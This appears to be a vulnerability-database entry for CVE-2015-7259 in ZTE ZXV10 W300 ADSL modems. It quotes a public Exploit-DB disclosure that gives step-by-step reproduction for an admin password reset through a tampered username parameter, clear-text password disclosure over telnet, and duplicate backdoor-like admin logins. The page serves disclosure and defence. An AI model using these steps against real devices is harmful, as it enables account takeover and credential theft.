CVE-2015-7259
Description
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow user accounts to have multiple valid username and password pairs, which allows remote authenticated users to login to a target account via any of its username and password pairs.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn GaneshenReferences
- http://packetstormsecurity.com/files/134336/ZTE-ADSL-Authorization-Bypass-Information-Disclosure.html
- http://packetstormsecurity.com/files/134493/ZTE-ADSL-ZXV10-W300-Authorization-Disclosure-Backdoor.html
- http://seclists.org/fulldisclosure/2015/Nov/48
- https://www.exploit-db.com/exploits/38772/
- http://packetstormsecurity.com/files/134336/ZTE-ADSL-Authorization-Bypass-Information-Disclosure.html
- http://packetstormsecurity.com/files/134493/ZTE-ADSL-ZXV10-W300-Authorization-Disclosure-Backdoor.html
- http://seclists.org/fulldisclosure/2015/Nov/48
- https://www.exploit-db.com/exploits/38772/
CWEs
CWE-255
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.